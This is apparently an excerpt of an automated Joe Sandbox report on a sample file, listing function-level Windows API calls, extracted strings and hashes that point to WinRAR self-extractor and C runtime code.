                                                                  • WriteFile.KERNEL32(?,00000000,00000000,00CDFE02,00000000,?,?,?,?,?,?,?,?,?,00CDFE02,00000000), ref: 00CDF7AA
                                                                  • WriteFile.KERNEL32(?,00000000,00000001,00CDFE02,00000000,?,?,?,?,?,?,?,?,?,00CDFE02,00000000), ref: 00CDF7E3
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                  • String ID:
                                                                  • API String ID: 1324828854-0
                                                                  • Opcode ID: 67f0f8e41e5898aea72241f259c6b4dfeb4aaa3cd909b1eef9f0aaae5f995bd8
                                                                  • Instruction ID: 5f42ebdf085948f1f7fbb694615910c19d26368ae607a3572bcd337d41ca2b95
                                                                  • Opcode Fuzzy Hash: 67f0f8e41e5898aea72241f259c6b4dfeb4aaa3cd909b1eef9f0aaae5f995bd8
                                                                  • Instruction Fuzzy Hash: 5D5173B19002499FDB10CFA4DC85AEEBBF4FF09310F14416EE656E7391D670AA42CBA1
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00CD2937
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 00CD293F
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00CD29C8
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00CD29F3
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00CD2A48
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: b51f4beaffd8ea4e020bd38b901db91b09ed345cd0fa8fc2b4af045cb9bd39e5
                                                                  • Instruction ID: 10c9770973edd0cb1dfc0ce8e7a5703bf4261e55f7d753a7c8acb73b4eb9903e
                                                                  • Opcode Fuzzy Hash: b51f4beaffd8ea4e020bd38b901db91b09ed345cd0fa8fc2b4af045cb9bd39e5
                                                                  • Instruction Fuzzy Hash: D541D634A00258AFCF10DF69C895A9EBBF5EF54324F148057EA19AB392D731DA01EF91
                                                                  APIs
                                                                  • ShowWindow.USER32(?,00000000), ref: 00CC9EEE
                                                                  • GetWindowRect.USER32(?,00000000), ref: 00CC9F44
                                                                  • ShowWindow.USER32(?,00000005,00000000), ref: 00CC9FDB
                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00CC9FE3
                                                                  • ShowWindow.USER32(00000000,00000005), ref: 00CC9FF9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Show$RectText
                                                                  • String ID: RarHtmlClassName
                                                                  • API String ID: 3937224194-1658105358
                                                                  • Opcode ID: 5b6f2ad9238e186986dbd17ba168ad74b0ec6fb6a878ada2699b5cfd074d0962
                                                                  • Instruction ID: 24527d95e82ec01e890eccd49b53517efbc67fbbafe7327aa666ebb9a4c74c75
                                                                  • Opcode Fuzzy Hash: 5b6f2ad9238e186986dbd17ba168ad74b0ec6fb6a878ada2699b5cfd074d0962
                                                                  • Instruction Fuzzy Hash: 3541CE31004304BFCB215FA5DC4CFAB7BA8FB48705F00851DF90A9A256DB34DA46CB62
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID: $&nbsp;$<br>$<style>body{font-family:"Arial";font-size:12;}</style>
                                                                  • API String ID: 176396367-3743748572
                                                                  • Opcode ID: 2d438db6d2b99b62212b3c304fbaeea640422622e6d335af3b145ba673076820
                                                                  • Instruction ID: 47487c7092b3f6031580af148193c1de4c6e7267888128c4f15304cf423b46ef
                                                                  • Opcode Fuzzy Hash: 2d438db6d2b99b62212b3c304fbaeea640422622e6d335af3b145ba673076820
                                                                  • Instruction Fuzzy Hash: 70315B3264434556DA34AB95DC46F7A73A4EB90320F50442FF5A6473D0FA70EF4193A5
                                                                  APIs
                                                                    • Part of subcall function 00CDC868: _free.LIBCMT ref: 00CDC891
                                                                  • _free.LIBCMT ref: 00CDC8F2
                                                                    • Part of subcall function 00CD8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?), ref: 00CD8DE2
                                                                    • Part of subcall function 00CD8DCC: GetLastError.KERNEL32(?,?,00CDC896,?,00000000,?,00000000,?,00CDC8BD,?,00000007,?,?,00CDCCBA,?,?), ref: 00CD8DF4
                                                                  • _free.LIBCMT ref: 00CDC8FD
                                                                  • _free.LIBCMT ref: 00CDC908
                                                                  • _free.LIBCMT ref: 00CDC95C
                                                                  • _free.LIBCMT ref: 00CDC967
                                                                  • _free.LIBCMT ref: 00CDC972
                                                                  • _free.LIBCMT ref: 00CDC97D
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                  • Instruction ID: 742c4ee9798f4b559c5f9eb9b43cbeadb21280dd284d630b2344640ff7912a2f
                                                                  • Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
                                                                  • Instruction Fuzzy Hash: 40111F71580B06BAE520B7B1CC87FCB7BAD9F44B00F404D16B39D662D2DA65B509F750
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,00CCE669,00CCE5CC,00CCE86D), ref: 00CCE605
                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00CCE61B
                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00CCE630
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                  • API String ID: 667068680-1718035505
                                                                  • Opcode ID: ca95a37cb3ce21230b47823e24e331c5d485aa2e538e23ea42323de246936eb5
                                                                  • Instruction ID: e0080752c0789812a2d499814020c8dd97a030acaabb9dbe08e028f8bc6d2307
                                                                  • Opcode Fuzzy Hash: ca95a37cb3ce21230b47823e24e331c5d485aa2e538e23ea42323de246936eb5
                                                                  • Instruction Fuzzy Hash: 8FF0FC367A27E59B0F214F76DC85FAA62C96A27755300443DFA15D7200EF20CE519BD0
                                                                  APIs
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC14C2
                                                                    • Part of subcall function 00CBB146: GetVersionExW.KERNEL32(?), ref: 00CBB16B
                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00CC14E6
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CC1500
                                                                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00CC1513
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1523
                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00CC1533
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$System$Local$SpecificVersion
                                                                  • String ID:
                                                                  • API String ID: 2092733347-0
                                                                  • Opcode ID: bd985cff12d0897fa31222e2d6c8b21890785d9149f3e57641772cf2a0934f2d
                                                                  • Instruction ID: 4696e6abef24a561ab1296c1d98f9e855e6cfa8fbc92159aae548ba898bf9954
                                                                  • Opcode Fuzzy Hash: bd985cff12d0897fa31222e2d6c8b21890785d9149f3e57641772cf2a0934f2d
                                                                  • Instruction Fuzzy Hash: D531E875108345ABC704DFA9C884A9FB7F8BF98714F044A1EF995C3210E734E649CBA6
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,?,00CD2AF1,00CD02FC,00CCFA34), ref: 00CD2B08
                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00CD2B16
                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00CD2B2F
                                                                  • SetLastError.KERNEL32(00000000,00CD2AF1,00CD02FC,00CCFA34), ref: 00CD2B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue___vcrt_
                                                                  • String ID:
                                                                  • API String ID: 3852720340-0
                                                                  • Opcode ID: 3ded764709644207d405101caa01c405bc57fed075c5f81d327fc9d7a34c6c72
                                                                  • Instruction ID: 36a0da1cfd8ace7dd926419127709532d88ff6901ec62a133f0c7f152dfe886c
                                                                  • Opcode Fuzzy Hash: 3ded764709644207d405101caa01c405bc57fed075c5f81d327fc9d7a34c6c72
                                                                  • Instruction Fuzzy Hash: 7A0124321183523FA7142B757CC9B2A2B8AEF627B07300B3BF321493E0EF915E00A504
                                                                  APIs
                                                                  • GetLastError.KERNEL32(?,00CF1098,00CD4674,00CF1098,?,?,00CD40EF,?,?,00CF1098), ref: 00CD97E9
                                                                  • _free.LIBCMT ref: 00CD981C
                                                                  • _free.LIBCMT ref: 00CD9844
                                                                  • SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD9851
                                                                  • SetLastError.KERNEL32(00000000,?,00CF1098), ref: 00CD985D
                                                                  • _abort.LIBCMT ref: 00CD9863
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$_free$_abort
                                                                  • String ID:
                                                                  • API String ID: 3160817290-0
                                                                  • Opcode ID: e97c79354d5f442bb3c880807526352dbe3586c1ea7360b0a874a4394d046e0c
                                                                  • Instruction ID: 5eb6326c261f8372d60d90567460bbf52dd885c5c4d1935b4b7e2540dcdb895e
                                                                  • Opcode Fuzzy Hash: e97c79354d5f442bb3c880807526352dbe3586c1ea7360b0a874a4394d046e0c
                                                                  • Instruction Fuzzy Hash: 56F0A43914464266C75233247C4AB2F2A66CFD2F75F25012BF724973D2EE348D06B565
                                                                  APIs
                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CCDC47
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CCDC61
                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CCDC72
                                                                  • TranslateMessage.USER32(?), ref: 00CCDC7C
                                                                  • DispatchMessageW.USER32(?), ref: 00CCDC86
                                                                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00CCDC91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                  • String ID:
                                                                  • API String ID: 2148572870-0
                                                                  • Opcode ID: d76b82bca1da8540cff2255c1ace6f6d3c6702a3b7f57fdfc04eee4927d7da56
                                                                  • Instruction ID: f4d46d5eaff86a5af182c774b70516d8d8cfa717093074bb847b3ae4cd6a4683
                                                                  • Opcode Fuzzy Hash: d76b82bca1da8540cff2255c1ace6f6d3c6702a3b7f57fdfc04eee4927d7da56
                                                                  • Instruction Fuzzy Hash: FCF03C72A01219BBCF20ABA5DC4CEDF7FADEF45791B008021F50AE2150DA749646C7B0
                                                                  APIs
                                                                    • Part of subcall function 00CC05DA: _wcslen.LIBCMT ref: 00CC05E0
                                                                    • Part of subcall function 00CBB92D: _wcsrchr.LIBVCRUNTIME ref: 00CBB944
                                                                  • _wcslen.LIBCMT ref: 00CBC197
                                                                  • _wcslen.LIBCMT ref: 00CBC1DF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$_wcsrchr
                                                                  • String ID: .exe$.rar$.sfx
                                                                  • API String ID: 3513545583-31770016
                                                                  • Opcode ID: 81b9814aa3197b7a116a8021827d0ca5ba0a86c4765a0a6dba59dbd885faa6ce
                                                                  • Instruction ID: 1b283ef4a32b45891cfa47e183276515ba468677a97b68070146fe6a165015a8
                                                                  • Opcode Fuzzy Hash: 81b9814aa3197b7a116a8021827d0ca5ba0a86c4765a0a6dba59dbd885faa6ce
                                                                  • Instruction Fuzzy Hash: C2413722540391D6CB31BF78D886EBFB3B8EF41714F24090EF9A1AB182EB505E81D395
                                                                  APIs
                                                                  • GetTempPathW.KERNEL32(00000800,?), ref: 00CCCE9D
                                                                    • Part of subcall function 00CBB690: _wcslen.LIBCMT ref: 00CBB696
                                                                  • _swprintf.LIBCMT ref: 00CCCED1
                                                                    • Part of subcall function 00CB4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CB40A5
                                                                  • SetDlgItemTextW.USER32(?,00000066,00CF946A), ref: 00CCCEF1
                                                                  • EndDialog.USER32(?,00000001), ref: 00CCCFFE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                                                  • String ID: %s%s%u
                                                                  • API String ID: 110358324-1360425832
                                                                  • Opcode ID: 54feb5897269bc542907652a23d975c24cc17613eca83d0bb899da4aa82eb60d
                                                                  • Instruction ID: db91296f08f0c21da84125ee16000c776f7fafc9a4f4985f2812dd167b1230e6
                                                                  • Opcode Fuzzy Hash: 54feb5897269bc542907652a23d975c24cc17613eca83d0bb899da4aa82eb60d
                                                                  • Instruction Fuzzy Hash: 854176B1900258A9DF25DB90CC85FEE77BCDB14340F4080AAF90AE7151EF709A45DF61
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00CBBB27
                                                                  • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,00CBA275,?,?,00000800,?,00CBA23A,?,00CB755C), ref: 00CBBBC5
                                                                  • _wcslen.LIBCMT ref: 00CBBC3B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen$CurrentDirectory
                                                                  • String ID: UNC$\\?\
                                                                  • API String ID: 3341907918-253988292
                                                                  • Opcode ID: d6e4d3302a221015bfa039efd5752267c2e01fe36735788620615d7334a7a1ba
                                                                  • Instruction ID: e4e1f8fd559d9637a631568fb6cdae18cf5714d695ba0236c306f2b0efb69466
                                                                  • Opcode Fuzzy Hash: d6e4d3302a221015bfa039efd5752267c2e01fe36735788620615d7334a7a1ba
                                                                  • Instruction Fuzzy Hash: 4841E331440255B7CF21EF21CC01EEE7BA8AF45391F10446AF965A3151EBF0EE90DB60
                                                                  APIs
                                                                  • LoadBitmapW.USER32(00000065), ref: 00CCB6ED
                                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00CCB712
                                                                  • DeleteObject.GDI32(00000000), ref: 00CCB744
                                                                  • DeleteObject.GDI32(00000000), ref: 00CCB767
                                                                    • Part of subcall function 00CCA6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6D5
                                                                    • Part of subcall function 00CCA6C2: SizeofResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA6EC
                                                                    • Part of subcall function 00CCA6C2: LoadResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA703
                                                                    • Part of subcall function 00CCA6C2: LockResource.KERNEL32(00000000,?,?,?,00CCB73D,00000066), ref: 00CCA712
                                                                    • Part of subcall function 00CCA6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00CCB73D,00000066), ref: 00CCA72D
                                                                    • Part of subcall function 00CCA6C2: GlobalLock.KERNEL32(00000000), ref: 00CCA73E
                                                                    • Part of subcall function 00CCA6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00CCA762
                                                                    • Part of subcall function 00CCA6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00CCA7A7
                                                                    • Part of subcall function 00CCA6C2: GlobalUnlock.KERNEL32(00000000), ref: 00CCA7C6
                                                                    • Part of subcall function 00CCA6C2: GlobalFree.KERNEL32(00000000), ref: 00CCA7CD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1305175428.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1305158217.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305202405.0000000000CE3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000CF5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305225878.0000000000D12000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1305290151.0000000000D13000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_cb0000_kBY9lgRaca.jbxd
                                                                  Similarity
                                                                  • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                  • String ID: ]
                                                                  • API String ID: 1797374341-3352871620
                                                                  • Opcode ID: 4104b46a10aff17171dbb1937de64fe40274e4dd599dac10c3b2677c99727404
                                                                  • Instruction ID: 23eace55e21aaa98af14f5e3b13b7da38433ea1c9d19933c3160c9c28c65519c
